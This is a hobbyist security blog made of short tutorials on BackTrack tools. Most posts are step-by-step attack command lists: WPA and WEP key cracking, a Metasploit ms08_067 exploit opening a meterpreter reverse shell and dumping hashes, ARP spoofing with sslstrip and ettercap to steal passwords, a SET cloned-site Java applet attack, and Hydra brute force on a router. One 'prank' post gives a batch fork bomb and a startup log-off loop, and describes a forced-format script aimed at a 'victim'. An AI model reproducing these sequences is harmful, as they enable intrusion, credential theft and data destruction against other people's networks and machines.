Cracking WPA using pyrit and aircrack

Hi all,

This is the follow on post to the pyrit set-up.
Once its been set-up you are able to test the strength of your WPA encrypted router.

There are a few important points to note when cracking WPA.
Firstly it has to be your own router or you must have permission from the administrator.
Secondly the key that your cracking has to be inside the list or dictionary file.
If the password isn't in the dictionary file, the key will not be cracked.
Note that 'insecurepass' is different to 'Insecsurepass'.
Finally their access point has to have a client connected because during the process of capturing a handshake, the client is de-authenticated allowing the handshake to be recaptured.

The method behind WPA cracking is different to that of WEP. WEP is cracked by repetition of the IV packets. WPA is cracked by firstly capturing the handshake, where the client connects to the AP, then brute forced using a dictionary or word list.

The commands:

airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 11 -w output --bssid mon0
aireplay --deauth 0 -a bssid -c client mon0

Ctrl + C to cancel the deauth and capture

pyrit eval 
pyrit -i pass.lst import_passwords
pyrit -e j2neonAP create_essid
pyrit eval
pyrit batch
pyrit verify
pyrit -o wpadb export_hashdb

aircrack -r wpadb output01.cap

Commands will differ for each WPA crack and access point. Firstly the -c is the channel of the AP, mines on 11. -w is simply the name of the text file and each bssid is different.
In the pyrit section pass.lst is a simple list that I created for the purpose of this vid and contains a few keys. This should be replaced with a decent word list or password list.
j2neonAP is my essid and again this is different for each, this is also used as a salt during the batch process.

Videos:

Blip.tv link:
Cracking WPA using pyrit and aircrack Blip.tv

YouTube link:
Cracking WPA using pyrit and aircrack YouTube

Sorry again, for the square mouse camtasia, VB and BT5 don't play together nicely.

Thanks
2neon

Installing pyrit into BT5

Hey all,

It's been a while again since the last video. I have spent some serious time doing boot to roots and the metasploit unleashed tut. Anyway this is a two part post; the first being the setup and the second being WPA cracking using pyrit.

That having been said, I'll get on with it!

Pyrit is used to create hash tables, this can be used to crack WPA and test how secure the wireless key is. In this post the primary object is to download and install all of the nessasary components for pyrit.

Pyrit also supports GPU processing, therefore as I have an Nvidia card, I will be setting up pyrit to run using CUDA. This step is optional and will be different if you are using AMD/ATi.

Also it's a good idea to run pyrit list_cores to make sure that it's all working correctly and if you want to see the speed of the cores, run the benchmark.

Commands

These commands are taken from another thread on the backtrack forum, as they are the best way to install it and have come up in posts multiple times.

svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn

apt-get install libssl-dev scapy python-dev
cd /pyrit_svn/pyrit
python setup.py build
python setup.py install

CUDA/Nvidia only!

Then download the nvidia-toolkit from:

http://developer.nvidia.com/cuda-toolkit-32-downloads

Download the CUDA Toolkit for Ubuntu Linux 10.04, it doesn't matter if you already have the graphics drivers as you will need this anyway as it has the compilers. Also, if you accidentally download the dev drivers you won't be able to install pyrit as you need this tool-kit!

sh cudatoolkit_3.2.16_linux_64_ubuntu10.04.run
cd /pyrit_svn/cpyrit_cuda 
python setup.py build
python setup.py install

pyrit list_cores
pyrit benchmark

Videos

Youtube:
Installing pyrit into BT5 YouTube

Blip.tv:
Installing pyrit into BT5 Blip.tv

Cheers
2neon

ssh with x11 and ftp in bt5

Hey all,

Well it's been a while and now university is done with and I've had time to play with BT5 (which is the all new and shiny backtrack) its time for a blog post 8-).

Right, so the concept is similar to remote desktop but you only have a shell. This is also secure, well as secure as you can make it.

This allows you to connect to one pc and run scripts, tool kits and programs from the a second.
The programs are still running on the first backtrack machine, just accessible from the second machine.
This is useful if you are out and about doing work/pentesting and need the power of the second machine.

Other than this, its useful for internet cafe usage as it will allow you to browse more securely.

The steps;

sshd-generate
/etc/init.d/ssh start
update-rc.d ssh defaults
ifconfig

This is all of the configuration 'needed', however, it's possible to use techniques such as fail2ban, setting different ports on the router or simply changing the port on backtrack of ssh. Ifconfig just checks the internal I.P. update-rc adds ssh to start up, which is not needed but will stop you typing /etc/init.d... every time.

Windows steps;

Download and install putty or just grab xming server as I believe putty is in there.
If you want secure ftp grab filezila.

Run all the installers and then open up putty.

Insert the I.P. either internal or external.
Enable x11 forwarding tab under SSH and type localhost:0
Click open to connect.
Hit in the user name and password, *This may take some time.*
and that should be it, if the x11 is working you should get visual programs like firefox etc.

For ftp make sure the port 22, which is default for ssh, is selected.
Biggest point here *If you are doing this across the internets make sure you have a long password and think about changing the port or implementing fail2ban.*

Video here:
ssh in bt5

Also on YouTube, watch it in 720p for clarity

Cheers
2neon

Metasploit xp sp2 exploit

Hi all,

This time I have been playing with metasploit and wow, it's pretty cool. Obviously this is quite well used, known and regularly updated. As it is the first time that I have used it I decided to make a vid and quick tutorial on how to do it.

So, first off, I set up a vulnerable xp sp2 box, the vulnerability being that Microsoft made it, teehee!
Then I used backtrack 4 with metasploit installed to use the ms08_067_netapi exploit.

Firstly update the framework:

cd /pentest/exploits/framework3
svn up

Once this has finished hit cd to get back to root:

nmap -O 192.168.0.1
msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.0.127  (This is the victims I.P.)
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST   (I.P. of your pc)
exploit    (this runs the exploit)

If all went well you should have a meterpreter shell open.

I then used some of the commands within the meterpreter to see how good it was!

sysinfo
ipconfig
help
hashdump
screenshot
shell

Video here;
metasploit xpsp2

Cheers.
2neon

Cuda-multiforcer

Righty then, 

This looks at how to crack hashes on the computers GPU. The reason for this, is the parallel architecture of the graphics cards makes certain programs so much faster to run. In this case it's perfect for cracking hashes.

CUDA programs have to be specifically written to run on the GPU and you cannot run anything else on there! Also CUDA is nvidia only, ATi has something similar. 

Right onwards...

Cuda-multiforcer isn't on the backtrack 4 iso. It is in the repositories, therefore;

apt-get install cuda-multiforcer

is all that is needed.

When cuda-multiforcer was first run I received an error; 

./CUDA-Multiforcer: error while loading shared libraries: libargtable2.so.0: cannot open shared object file: No such file or directory.

After some googling, the fix was simple, copy the contents of

/pentest/passwords/cuda-multiforcer/lib32

to

/lib

Ok, running the cuda-multiforcer;

cd /pentest/passwords/cuda-multiforcer

./CUDA-Muliforcer -c charsets/charsetlowercasenumeric -f /root/j2neon/hash.txt --min 3 --max 6 -h MD5

Ok, the options;

-c is the character set which is in charsets  folder depending on what you need 

-f is the location of the file containing the hash's

--min minimum character length  

--max maximum character length 

-h hash type 

Video:

Cuda-multiforcer

The passwords were short but it's still seriously fast!

Until next time.

Cheers 

2neon

What's to come?

Hey all,

As it has again been ages since any real updates I thought I would explain what's going on!

I finished my paper for university, which was on password cracking using parallel processors, my results will be on here but not just yet.

Now I've been playing with GPU related stuff there is going to be a fair amount of CUDA related security tools such as pyrit and crark.

Stay tuned, 

2neon

ARP spoof & ettercap

With a little bit of sslstrip and urlsnarf thrown in for good measure.

So, new blog post and vid are here this is what I did:

Firstly I edited etter.conf to allow the usage of ip tables,
then enabled ip forwarding,
next arp spoofed the broadcast address.

This step tells the router that I am the victim and the victim I am the router. You can set the I.P. to that of one machine or if you use the broadcast address, in my case 255, you can target the victims network.

The next step is to set up the iptables, this takes anything coming in on port 80 i.e. internet traffic, and puts it on to port 1000 which is where sslstrip is running.

sslstrip removes the SSL encryption, this is done by removing the request from the client for the ssl certificate.

Once you have removed this you can then do what ever you wish to the victim.

I used ettercap to capture the passwords and urlsnarf to see what the victim was accessing in realtime. You can also use driftnet which shows the images from the website that your victim is viewing.

The commands:

kate /etc/etter.conf
remove the # on the iptables for linux
echo 1 > /proc/sys/net/ipv4/ip_forward (this enables ip forwarding)
you can use cat  /proc/sys/net/ipv4/ip_forward to see the contents
arpspoof -i eth0 -t 192.168.0.255 192.168.0.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
sslstrip is waiting on port 1000 so
sslstrip -a -k -f  (these commands kill the session and work quietly)
ettercap -T -q -i eth0

The video:
Arp spoof vid

Cheers
2neon

SET Java Applet Attack

I am going to be looking at Java applet attack using SET, which is the social engineering tool kit.

SET uses smart ways of exploiting the user rather than the system. This means that it's easier to get the victim to give you access rather than breaking into the system its self. 

This attack uses the Java applet attack method to firstly clone a web site and add on a fake Java applet with a payload then ettercap uses DNS poisoning to force the user to visit this web site.

Finally the payload is a metasploit reverse connection shell allowing the attack to use the metasploit commands to do whatever he wants. There will be a metasploit video coming soon!

In a shell the directory is changed of that of SET using cd /pentest/exploits/SET

execute set using ./set
update set, then exit reload set using ./set

and update the metasploit modules.

The next step is to change the settings using nano config/set_config

apt-get the 2 Java packages (you don't need both but I would always rather over do it!)

edit the config and save with ctrl + x

Reload SET and then your ready to set up a cloned website. 

Once the victim has accepted the fake java applet, you own him :D 

SET is a fantastic tool, have a look round and play with it. 

Video:
SET Java Applet attack

Cheers

2neon

Geoffrey everything about you is sooooo Geoffrey!

*random post* .bat

This is a pointless post really lol.
Most people know about it already.
I thought it would be a good idea just add a few bits.
Open notepad, copy text in, save as, change save as type to all files, then name.bat
In backtrack use kate and save it as something.bat

3 of the funniest batch files.

shutdown -l

Simple log off batch however chuck it into the startup folder and every time the victim logs in they will be logged out.

:a
start
goto :a

This is a fork bomb.
It opens a cmd shell inside another and more and more until the pc can't handle it,
which is usually seconds. Picture here 

Last one which is harsh but funny, don't run it yourself!

Formatting

*Anti-virus' read this as a trojan so I linked it in a pastebin here*

The speed this formats, is rapid. By the time the victim realises what is going on, its reinstall time.
It formats the system drive in forced mode then shuts the pc down.

The locations of startup do vary between xp and w7.
Here are the default startup locations:

w7: C:\Users\Victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup
xp: C:\Documents and Settings\Victim\Start Menu\Programs\Startup

Next time something more hackerererish.

Cheers
2neon

Meller "What Would Meller Do?" '10

Wireless Router Passwords Hydra

I know, its been a while, but after a fair few pints of Guinness on St. Patricks day I decided to do this video.
Strangely enough the vid didn't need much editing, I'm just very lazy!

Right, the router is a standard virgin media device, the attack is brute force as it just tries all the different passwords on the list, if the password isn't on the list, you're not going to crack it. Note as well that some routers will not let you do this!

The only values that you will really have to change is the location of the word list as my 2neon was full of random words for this video -p.
and the I.p. address of the router as yours might not be on 192.168.0.1


Video:
Hydra cracking 


Cheers
2neon

Under Pricey's regime "You can keep messing about, but you will be kicked out"

WEP Cracking

So next vid then, I decided to show how to crack a WEP key. WEP is very insecure and not too difficult to break.

So before everyone thinks "yay free wifi" don't start breaking in to your next doors wifi. Instead, try advising them that maybe they should think about changing their security.

A few prerequisites;
You will struggle to do this in a virtual box.
A lot of  laptop network cards will not work as there are driver issuses.
The network card must be able to switch to monitor mode and if it can also packet inject, it makes life easier.

Theory:
So why is WEP so insecure? WEP uses the RC4 stream cipher, an initialisation vector and the WEP key.
The initialisation vectors(IV) is only 24bits long which is far to short. When packets are sent though the access point, the WEP key plus the IV are sent meaning that it is visible for all to see. Once the attack has seen or collected enough of these IV's its possible to work out the WEP key. By re-injecting the packets we are able to speed up this process.


The steps:

airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c -w 2neon --bssid (bssid) mon0
aireplay-ng -1 0 -a (bssid) mon0
aireplay-ng -3 -b (bssid) mon0
aircrack-ng -b (bssid) (2neon-01.cap)

-c is the channel of the access point
-w is a text file name it anything aslong as at the end you call txt-01.cap

The video:
WEP cracking in BT

Again the mouse was gayed when recording this, will make sure that in the next vids that is sorted.

In the words of swaZ "we're cooking now".

Cheers
2neon

Etterfilters

Hi all.

So this is the first actual attack that we are going to do. It is a man in the middle type attack, this means we sit in between the router and the victim. Any traffic that goes between the two points first has to pass through my pc.

<Router>------<my pc>------<Victim>

This is done using ARP poisoning.

The ettercap filter is harmless and is essentially an IF statement.
The IF statement checks if the there are picture on the victims web traffic and replaces the pictures which the one that you specify.

The filter can be found here:
Irongeeks Ettercap Filter

The video can be found here:
Ettercap Filter Video

In the video, on the victim machine, I had to refresh as the first time firefox loads the page, it is pulled from the cache.


2neon

VBox Install BT4

OK, first off the video on this isn't fantastic.
For some reason when recording the mouse came out as a square :/

In this video I install backtrack 4 R2 in a virtualbox.

This is just a very simple install to the virtual box hard drive.
The install and tweaks are just how I like to set it up.

The steps:
Firstly creating a new machine in a virtual box, with hard drive and customised settings.
Next boot from the bt4 iso.
startx
Install
Select location and keyboard settings.
Select amount of disk space to use.
Once the install has finished reboot.

login: root

pass: toor

fix-splash800 

nano /root/.bash_profile

start-network

startx

hit ctrl + x

and save it.

reboot again
system menu -> storage media-> open additions-> open terminal
ls
bash VBoxLinuxAdditions.run
apt-get -y update
apt-get -y upgrade

The video:
VB install of BT4

Not sure why it decided to play up on me :(

Cheers
2neon

Live USB install

Right guys,

I decided to take it right from the basics so in this post and video I have downloaded and installed backtrack 4 R2.

This is a live install, which means if you make ANY changes, once you reboot they will be lost.

For those who don't know what Backtrack is, it's a custom distribution of Linux with the primary intention of penetration testing, exploiting and so on.
Found here http://www.backtrack-linux.org/

Please enjoy the video linked below any feedback would be fantastic and very useful.

Live install of BT4R2 to USB

Thanks
2neon

P.S. Thanks to my friend Heliocentric who is providing the tunes.

2neon has a blog

So I have decided to create a blog.

The idea behind the blog is to keep people updated on security vids and my program development.

As all of this is kind of  new to me it may be a little tedious to start with so bare with me.

So, the videos are going to be using a backtrack virtual box and then a victim machine/virtual box.
This part I am familiar with, the recording will be using camtasia, which is something to look forward to :(

Finally I am trying to develop a program using the CUDA architecture, more on this later!

Cheers
2neon